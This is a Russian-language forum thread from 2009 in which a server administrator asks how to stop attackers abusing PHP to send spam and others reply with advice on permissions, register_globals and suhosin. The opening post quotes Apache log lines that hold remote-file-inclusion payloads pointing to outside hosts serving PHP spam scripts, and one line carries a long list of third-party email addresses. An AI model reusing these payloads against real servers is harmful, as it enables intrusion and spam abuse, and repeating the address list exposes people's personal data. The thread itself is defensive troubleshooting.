Продолжение темы http://www.opennet.me/openforum/vsluhforumID1/84188.html

По логам апача убедился что ломают именно через php. Причем используют как минимум 2 уязвимости.

1-ю:  register_globals (которую добрые сайтописцы заставили держать включенной :(:(:() я закрыл. Правда теперь не работает редактирование инфы на сайте, но т.к. оно делается только из канторы, то включать буду "по требованию".

А вот со второй непонятки. В логе есть строка

196.3.183.73 - - [25/Feb/2009:14:26:16 +0300] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.defcel.fr/fddvf.txt??? HTTP/1.1" 200 3279

Где как я выяснил http://www.defcel.fr/fddvf.txt - php скрипт, который занимается рассылкой спама от адреса apache@name-machine.domain-name.spb.ru. В очереди скапливается куча сообщений (вчера грохнул почти 1500).

Еще в логе есть подобная инфа:

189.73.86.45 - - [22/Feb/2009:01:25:19 +0300] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://axispropertyinvestment.com/deals_pdf/test.txt?&sendto...
gida@gida.com.br+gidantas@dglnet.com.br+gidantas@dglnetcom.br+gidapulga@hoymail.com+gidaro@net-k.com.br+giddings@rconnect.com+gidds@iafrica.com+gideao@svn.com
.svn+gidel@uninet.com.br+gidelvan@seicom.com.br+gidelvan@vento.com.br+gideon@autobahn.org+gideon@cpunet.com.br+gideon@michigandental.com+gideone.lima@bol.br+g
idev@gidev.com.br+gideval@bnb.gov.br+gidiaz@na.cokecce.com+gidiel@portoweb.com.br+gidion@gidion.com.br+gidion@netville.com.br+gidioni@zipmail.coj+gidogawa@btm
.com.br+gidon.albert@viacom.com+gidonini@sercomtel.com.br+gidrumon@prover.com.br+gidurbh11@caixa.gov.br+gidurbh3@caixa.gov.br+gidurbh5@caixa.gov.br HTTP/1.1"
200 2293

Подскажите, как надо настроить PHP, чтобы избежать подобной гадости?

Сейчас копаю инфу на тему запуска апача в chroot-е

• Продолжение взлома сервера (проблема PHP),LS, 17:19 , 25-Фев-09
• Продолжение взлома сервера (проблема PHP),LS, 17:23 , 25-Фев-09
  • Продолжение взлома сервера (проблема PHP),Дмитрий, 10:13 , 26-Фев-09
    • Продолжение взлома сервера (проблема PHP),Дмитрий, 10:16 , 26-Фев-09
• Продолжение взлома сервера (проблема PHP),LS, 17:38 , 25-Фев-09
  • Продолжение взлома сервера (проблема PHP),Дмитрий, 10:18 , 26-Фев-09
• Продолжение взлома сервера (проблема PHP),angra, 04:22 , 26-Фев-09
  • Продолжение взлома сервера (проблема PHP),Oyyo, 09:16 , 26-Фев-09
  • Продолжение взлома сервера (проблема PHP),Дмитрий, 10:08 , 26-Фев-09
• Продолжение взлома сервера (проблема PHP),Дмитрий, 09:33 , 27-Фев-09

какие из известных пхп прикладов на твоем апаче крутятся?

>189.73.86.45 - - [22/Feb/2009:01:25:19 +0300] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http:

а какого хрена у тебя это место вообще для записи из апача доступно. разве не ясно что все данные надо хранить ВНЕ структуры каталогов веб-сервера?

тут нах о chroot речь даже не идет. тебе через апач пишут на винт. вопрос - зачем ты дал этому процессу возможность записи в корневой каталог твоих виртуальных серверов? ему оттуда только читать надо. а весь нормальный софт располагает свои каталоги с данными за пределами этого корня.

>[оверквотинг удален]
>
>а какого хрена у тебя это место вообще для записи из апача
>доступно. разве не ясно что все данные надо хранить ВНЕ структуры
>каталогов веб-сервера?
>
>тут нах о chroot речь даже не идет. тебе через апач пишут
>на винт. вопрос - зачем ты дал этому процессу возможность записи
>в корневой каталог твоих виртуальных серверов? ему оттуда только читать надо.
>а весь нормальный софт располагает свои каталоги с данными за пределами
>этого корня.

Апач не имеет права доступа записи на сайт (Owner:Group вообще не апачные). Право записи имеет только FTP узверь (от которого и заливался сайт). В прошлой теме я и писал, что засланные казачки обнаруживались в tmp дирах (/tmp и /var/tmp).

Подскажите, как моно запретить апачу какую либо запись выше DOCUMENT_ROOT? Т.к. одна дир в сайте требует наличия этого права. Попозже постараюсь выяснить насколько это необходимо.

PS:
Сейчас проверил и ни одна дира не имеет во владельцах апача, а права на сайтовые диры выставлены как 755

короче мне кажется тут  тривиальная проблема chmod и chown, на которую ты должен потратить некоторое количество времени

>короче мне кажется тут  тривиальная проблема chmod и chown, на которую
>ты должен потратить некоторое количество времени

owner:group не апачевские права 755

Любопытный способ, странно только что register_globals off это не закрыл. Самое время обновить пых и доставить на него suhosin. Потом посмотреть сколько из хостящихся у вас сайтов не переживут встречи с suhosin и проклясть пых с его пыхобыдлокодерами :)

>Любопытный способ, странно только что register_globals off это не закрыл. Самое время
>обновить пых и доставить на него suhosin. Потом посмотреть сколько из
>хостящихся у вас сайтов не переживут встречи с suhosin и проклясть
>пых с его пыхобыдлокодерами :)

angra +1 +1

>Любопытный способ, странно только что register_globals off это не закрыл. Самое время
>обновить пых и доставить на него suhosin. Потом посмотреть сколько из
>хостящихся у вас сайтов не переживут встречи с suhosin и проклясть
>пых с его пыхобыдлокодерами :)

В том то и дело, что (как я и написал выше) register_globals был открыт по требованию сайтописцев (убывать таких надо, если кому интересно, то это некий беляков, с ранее одноименным сайтом с окончанием на ком :(:(:(:(:(:( ). Если отключить этот парам, то один сайт из 3-х вообще отказывался грузится. Вчера я немного полабал с его пхп текстом, и (по аналогии с 2-я рабочими) заставил и его работать с register_globals off. Но заставить работать админскую часть сайта пока не удалось. Буду лабать дальше.

Подскажите, а что это за зверь suhosin? И с чем его едят?

Если кому еще интересно, нашел интересную статью по теме

http://www.opennet.me/openforum/vsluhforumID1/84250.html